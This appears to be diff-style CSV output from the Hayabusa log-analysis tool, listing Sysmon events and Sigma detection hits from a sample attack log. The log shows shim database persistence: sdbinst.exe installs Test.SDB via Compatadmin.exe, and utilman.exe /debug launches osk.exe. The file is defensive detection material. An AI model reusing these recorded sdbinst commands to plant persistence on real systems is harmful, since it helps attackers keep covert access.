+2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.509 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.559 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3612 | PGUID: 365ABB72-55A1-5C91-0000-00102D930700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2368 | PGUID: 365ABB72-55A1-5C91-0000-0010D6960700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.930 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3004 | PGUID: 365ABB72-55A4-5C91-0000-00103DA60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.807 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{d2c22380-b7b0-4d3a-b36e-bb0e804c265c}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.807 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.807 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.867 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.978 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3908 | PGUID: 365ABB72-55D7-5C91-0000-0010DDC30700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3648 | PGUID: 365ABB72-55D8-5C91-0000-001060C90700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:28.168 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4024 | PGUID: 365ABB72-55DB-5C91-0000-001094D60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.802 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{bebe1bf6-4a2e-46ad-9266-3fbf73d269a4}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.802 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.802 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.832 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.972 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2108 | PGUID: 365ABB72-55E8-5C91-0000-0010AEE50700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2104 | PGUID: 365ABB72-55E9-5C91-0000-00102EEB0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:45.172 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2568 | PGUID: 365ABB72-55EB-5C91-0000-001076F60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 612 | PGUID: 365ABB72-5638-5C91-0000-0010651A0800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.953 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{7146b11e-ec78-4046-b854-9c9bdc68691e}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.953 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.953 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.983 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.104 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4012 | PGUID: 365ABB72-568A-5C91-0000-0010A6450800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.364 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4072 | PGUID: 365ABB72-568A-5C91-0000-0010D24B0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2476 | PGUID: 365ABB72-568D-5C91-0000-001061560800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.144 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{9aadf096-343f-4575-9514-4e5551e5ff19}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.144 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.144 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.154 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
